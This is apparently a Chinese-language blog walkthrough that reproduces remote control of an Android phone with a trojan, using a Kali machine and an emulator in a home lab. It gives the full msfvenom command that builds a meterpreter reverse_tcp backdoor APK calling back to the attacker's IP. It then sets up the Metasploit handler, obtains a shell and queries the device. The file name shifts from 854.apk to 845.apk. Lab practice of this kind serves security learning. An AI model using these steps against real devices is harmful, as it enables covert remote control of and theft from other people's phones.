**手机木马远程控制复现**

54 阅读1分钟
  • 环境
  • 攻击机:Kali-Linux-2021 虚拟机IP:192.168.1.47
  • 靶机:Android模拟器虚拟机 IP:192.168.1.7
  •  
  • 开始复现

·        首先从官网上下载模拟器雷电地址点击打开链接​ ·       

·        下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。 ​​ ·       

·        安装完成后在电脑桌面显示下面logo ​​      

·        对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:​ 首先打开kali,输入sudo su获取root模式 ​

生成apk后门,lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.47 lport=5001 R >854.apk ​

(生成apk文件)

生成文件后我们到/845.apk目录下拷贝我们的apk文件到我们的windows平台下然后启动我们的雷电模拟器,点击启动,在右下角有个apk,点击选择文件安装 ​ ​ (成功安装木马文件)

使用metasploit控制台对模拟器进行攻击:

启动msfconsole ​

加载模块

use exploit/multi/handler ​

(设置exploit)

设置模块

set payload android/meterpreter/reverse_tcp ​

(paload设置)

设置攻击机ip和端口号和启动后

输入show options查看参数 ​

(监听中)

 Run一下,执行漏洞 ​​  

回到我们的模拟器靶机,点击运行我们安装的文件,等待上线 ​

双击运行

  看到成功返回shell ​

(返回shell)

查看模拟手机的版本信息:sysinfo ​

(查看android版本信息)

查看网络信息

Ipconfig ​

到这就结束了,感兴趣的小伙伴还不赶快去试试,提醒,仅供自己试验,拒绝恶搞别人。